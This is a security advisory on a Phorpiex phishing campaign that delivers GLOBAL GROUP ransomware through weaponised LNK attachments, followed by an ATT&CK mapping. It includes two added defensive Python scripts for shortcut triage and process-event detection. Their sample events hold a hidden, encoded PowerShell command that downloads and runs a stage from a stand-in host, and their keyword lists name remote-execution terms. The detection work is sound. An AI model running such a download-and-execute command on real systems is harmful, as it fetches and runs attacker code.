Phorpiex Phishing Delivers Low-Noise Global Group Ransomware - Advisories

A large-scale phishing campaign is utilizing the Phorpiex botnet to distribute GLOBAL GROUP ransomware

Threat: Phishing Campaign
Targeted Region: Global
Targeted Sector: Technology & IT
Criticality: High

EXECUTIVE SUMMARY:

A large-scale phishing campaign is leveraging the Phorpiex botnet to distribute GLOBAL GROUP ransomware. Phorpiex, historically known for spam propagation, sextortion, and malware delivery, continues to evolve as a flexible criminal distribution platform. In this activity, attackers relied on phishing emails containing malicious Windows shortcut (LNK) attachments crafted to resemble legitimate documents. The emails used social engineering lures to persuade recipients to open the attachment, initiating a concealed execution chain. This campaign illustrates how threat actors combine established malware infrastructure with ransomware payloads to amplify operational reach and financial impact. Rather than exploiting software vulnerabilities, the attackers primarily targeted human behavior, highlighting the enduring effectiveness of email-based deception. The abuse of LNK files allowed the delivery mechanism to appear benign while embedding hidden commands. The operation reflects a broader trend in which botnets function as initial access facilitators for ransomware operators. Overall, the incident demonstrates the convergence of phishing, modular malware staging, and ransomware monetization techniques.

The infection sequence begins with a phishing email carrying a weaponized LNK attachment. When executed, the shortcut triggers obfuscated commands that initiate a multi-stage download routine. Instead of immediately deploying ransomware, the LNK file launches scripts that retrieve additional payloads from attacker-controlled infrastructure. These payloads include components associated with Phorpiex, which establish persistence and enable follow-on actions such as system profiling, potential credential access, or further malware distribution.
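Because the whole chain hinges on what the shortcut quietly launches, the first triage step for a suspicious attachment is to read the LNK file statically rather than open it. The following Python script is an added example, not code from the advisory or its authors: it walks the public MS-SHLLINK layout (fixed 76-byte ShellLinkHeader, optional LinkTargetIDList and LinkInfo, then the StringData fields) to recover the target and command-line arguments, and flags traits common to lure shortcuts. The indicator keyword list, the `SCRIPT_HOSTS` list and the two constructed shortcuts at the bottom are assumptions made for the demo; the placeholder base64 string stands in for whatever encoded command a real sample would carry.

```python
"""Static triage of a Windows shortcut (.lnk) file.

Added example for this advisory (not the advisory authors' code). Parses the
MS-SHLLINK header and StringData fields to recover the target and arguments a
shortcut would launch, then flags lure traits: a script-host target, a window
that starts minimised, and encoded/hidden/download-style arguments.
"""
import struct

# CLSID 00021401-0000-0000-C000-000000000046 in its on-disk little-endian form
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits (MS-SHLLINK section 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

SW_SHOWMINNOACTIVE = 7  # ShowCommand value: the window starts minimised

# Heuristics chosen for this example (assumption, not the advisory's rules)
SCRIPT_HOSTS = ("cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe")
ARGUMENT_INDICATORS = ("-enc", "-encodedcommand", "-w hidden", "-windowstyle hidden",
                       "iex", "invoke-expression", "downloadstring", "downloadfile",
                       "invoke-webrequest", "bypass", "http://", "https://")


def parse_lnk(data: bytes) -> dict:
    """Return the LinkFlags, ShowCommand and StringData fields of a shortcut."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LINK_CLSID:
        raise ValueError("not a shell link (.lnk) file")
    flags, = struct.unpack_from("<I", data, 20)
    show_command, = struct.unpack_from("<I", data, 60)
    pos = 76
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (2 bytes) then the IDList
        size, = struct.unpack_from("<H", data, pos)
        pos += 2 + size
    if flags & HAS_LINK_INFO:                    # LinkInfoSize counts itself
        size, = struct.unpack_from("<I", data, pos)
        pos += size
    fields = {"flags": flags, "show_command": show_command}
    for bit, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        if not flags & bit:
            continue
        count, = struct.unpack_from("<H", data, pos)   # CountCharacters, no terminator
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le", "replace")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return fields


def triage_lnk(data: bytes) -> dict:
    """Parse a shortcut and list the lure traits it exhibits."""
    info = parse_lnk(data)
    target = info.get("relative_path", "")
    args = info.get("arguments", "")
    findings = []
    if target.lower().endswith(SCRIPT_HOSTS):
        findings.append(f"target is a script host: {target}")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("window starts minimised (SW_SHOWMINNOACTIVE)")
    hits = [k for k in ARGUMENT_INDICATORS if k in args.lower()]
    if hits:
        findings.append("argument indicators: " + ", ".join(hits))
    if len(args) > 200:
        findings.append(f"unusually long argument string ({len(args)} chars)")
    return {"target": target, "working_dir": info.get("working_dir", ""),
            "arguments": args, "show_command": info["show_command"],
            "findings": findings, "suspicious": len(findings) >= 2}


def build_sample_lnk(target: str, arguments: str, show_command: int = 1) -> bytes:
    """Construct a minimal Unicode shortcut for the demo (not a real-world sample)."""
    flags = HAS_LINK_TARGET_ID_LIST | HAS_RELATIVE_PATH | HAS_WORKING_DIR | IS_UNICODE
    if arguments:
        flags |= HAS_ARGUMENTS
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LINK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    id_list = struct.pack("<H", 2) + b"\x00\x00"       # IDList holding only TerminalID

    def string_data(text: str) -> bytes:
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    body = string_data(target) + string_data("C:\\Windows\\System32")
    if arguments:
        body += string_data(arguments)
    return header + id_list + body


# Constructed samples: a lure-style shortcut and a plain one
LURE = build_sample_lnk("..\\..\\..\\Windows\\System32\\cmd.exe",
                        "/c powershell.exe -w hidden -nop -EncodedCommand PLACEHOLDER_BASE64",
                        SW_SHOWMINNOACTIVE)
BENIGN = build_sample_lnk("..\\..\\..\\Windows\\System32\\notepad.exe", "", 1)

if __name__ == "__main__":
    for label, blob in (("lure", LURE), ("benign", BENIGN)):
        result = triage_lnk(blob)
        print(label, "suspicious" if result["suspicious"] else "clean", result["findings"])
```

Run it on a quarantined attachment by reading the file into `triage_lnk`; a document-named shortcut whose target is cmd.exe or powershell.exe, starts minimised and carries an encoded command is exactly the profile described above, and the recovered argument string is what to hand to the PowerShell-audit step.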
The staged architecture improves evasion by separating the initial execution from the final ransomware payload. Heavily obfuscated PowerShell and command-line instructions conceal malicious intent and complicate detection. In later phases, GLOBAL GROUP ransomware is delivered and executed, encrypting files and presenting a ransom demand. The attackers rely extensively on legitimate system utilities, applying “living-off-the-land” techniques to reduce forensic visibility. Additionally, Phorpiex’s botnet functionality supports high-volume email dissemination, allowing the campaign to scale efficiently. The combination of phishing, script-based loaders, and ransomware demonstrates a stealth-oriented, modular attack framework.

This campaign reinforces the continued effectiveness of phishing as a dominant initial access vector, even against organizations with established security controls. By exploiting user interaction through deceptive LNK attachments, attackers bypass perimeter defenses and initiate sophisticated, multi-stage malware chains. The integration of a long-standing botnet with ransomware highlights the increasing collaboration and specialization within the cybercriminal ecosystem. The use of obfuscated scripts and legitimate administrative tools demonstrates a clear emphasis on stealth, persistence, and defense evasion.

To mitigate similar threats, organizations should adopt layered protections including advanced email filtering, behavioral monitoring, script control policies, and endpoint detection and response capabilities. Restricting LNK execution, auditing PowerShell activity, and strengthening user awareness programs can significantly reduce compromise risk. The incident underscores that legacy malware families remain highly dangerous when adapted to modern ransomware operations. Ultimately, the activity serves as a reminder that social engineering combined with modular malware delivery continues to pose a critical security challenge.
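The behavioral monitoring and PowerShell auditing recommended above come down to a few process-lineage and command-line rules. The following Python script is an added example, not code from the advisory or its authors: it scores process-creation events shaped like Sysmon Event ID 1 records (Image, ParentImage, CommandLine) for the chain described here, a shell or script host started by explorer.exe (what a double-clicked shortcut produces), a hidden window, and an -EncodedCommand payload, which it decodes so the download-and-execute intent is visible to an analyst. The rules, the field names, the sample events and the TEST-NET address inside them are constructed for this example.

```python
"""Behavioural detection for the shortcut -> cmd.exe -> PowerShell loader chain.

Added example for this advisory (not the advisory authors' code). Scores
Sysmon-style process-creation events and decodes -EncodedCommand payloads
(base64 of UTF-16LE) to expose remote download/execution terms.
"""
import base64
import json
import re

# Heuristics chosen for this example (assumption, not the advisory's rules)
SCRIPT_HOSTS = ("cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe")
REMOTE_EXEC_TERMS = ("invoke-expression", "iex", "downloadstring", "downloadfile",
                     "invoke-webrequest", "net.webclient", "http://", "https://")
# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)
ENCODED_RE = re.compile(r"(?i)[-/]e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{8,})")
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden")


def decode_encoded_command(command_line: str):
    """Return the decoded -EncodedCommand text, or None if there is none / it is malformed."""
    match = ENCODED_RE.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event: dict) -> list:
    """Return the findings for one process-creation event (empty list = nothing notable)."""
    image = event.get("Image", "").lower()
    parent = event.get("ParentImage", "").lower()
    cmdline = event.get("CommandLine", "")
    findings = []
    if parent.endswith("\\explorer.exe") and image.endswith(SCRIPT_HOSTS):
        findings.append("script host spawned by explorer.exe (double-clicked file or shortcut)")
    if HIDDEN_RE.search(cmdline.lower()):
        findings.append("hidden window requested")
    if cmdline.count("^") >= 4:
        findings.append("cmd.exe caret obfuscation")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        terms = [t for t in REMOTE_EXEC_TERMS if t in decoded.lower()]
        detail = f"encoded command decodes to: {decoded!r}"
        if terms:
            detail += " (remote execution terms: " + ", ".join(terms) + ")"
        findings.append(detail)
    return findings


def analyze_events(lines) -> list:
    """Parse JSON event lines and return an alert for every event that has findings."""
    alerts = []
    for index, line in enumerate(lines):
        event = json.loads(line)
        if event.get("EventID") != 1:          # only process-creation records
            continue
        findings = analyze_event(event)
        if findings:
            alerts.append({"index": index, "image": event.get("Image"),
                           "severity": "high" if len(findings) >= 2 else "medium",
                           "findings": findings})
    return alerts


def build_sample_events() -> list:
    """Constructed Sysmon-style events: a document open, the loader chain, a service start."""
    staged = "Invoke-Expression (Invoke-WebRequest -UseBasicParsing 'http://203.0.113.5/stage').Content"
    encoded = base64.b64encode(staged.encode("utf-16-le")).decode("ascii")
    events = [
        {"EventID": 1, "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
         "ParentImage": r"C:\Windows\explorer.exe",
         "CommandLine": r'"WINWORD.EXE" /n "C:\Users\alice\Downloads\Invoice.docx"'},
        {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
         "ParentImage": r"C:\Windows\explorer.exe",
         "CommandLine": f"cmd.exe /c powershell.exe -w hidden -nop -enc {encoded}"},
        {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "ParentImage": r"C:\Windows\System32\cmd.exe",
         "CommandLine": f"powershell.exe -w hidden -nop -enc {encoded}"},
        {"EventID": 1, "Image": r"C:\Windows\System32\svchost.exe",
         "ParentImage": r"C:\Windows\System32\services.exe",
         "CommandLine": "svchost.exe -k netsvcs -p"},
    ]
    return [json.dumps(e) for e in events]


if __name__ == "__main__":
    for alert in analyze_events(build_sample_events()):
        print(alert["severity"].upper(), alert["image"])
        for finding in alert["findings"]:
            print("   -", finding)
```

The explorer.exe-to-script-host rule is deliberately broad (it also fires on a user double-clicking a legitimate .bat file), which is why severity only rises to high when a second trait such as a hidden window or an encoded downloader is present; the decoded text is what an analyst pivots on to find the staging host.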
THREAT PROFILE:

| Tactic | Technique ID | Technique | Sub-Technique |
|---|---|---|---|
| Reconnaissance | T1598 | Phishing for Information | — |
| Resource Development | T1587 | Develop Capabilities | — |
| Initial Access | T1566.001 | Phishing | Spearphishing Attachment |
| Execution | T1204.002 | User Execution | Malicious File |
| Execution | T1059.001 | Command and Scripting Interpreter | PowerShell |
| Persistence | T1547.001 | Boot or Logon Autostart Execution | Registry Run Keys / Startup Folder |
| Privilege Escalation | T1068 | Exploitation for Privilege Escalation | — |
| Defense Evasion | T1027 | Obfuscated Files or Information | — |
| Defense Evasion | T1218 | System Binary Proxy Execution | — |
| Credential Access | T1555 | Credentials from Password Stores | — |
| Discovery | T1082 | System Information Discovery | — |
| Discovery | T1016 | System Network Configuration Discovery | — |
| Lateral Movement | T1021 | Remote Services | — |
| Collection | T1005 | Data from Local System | — |
| Command and Control | T1071 | Application Layer Protocol | — |
| Command and Control | T1105 | Ingress Tool Transfer | — |
| Exfiltration | T1041 | Exfiltration Over C2 Channel | — |
| Impact | T1486 | Data Encrypted for Impact | — |

REFERENCES:

The following reports contain further technical details:
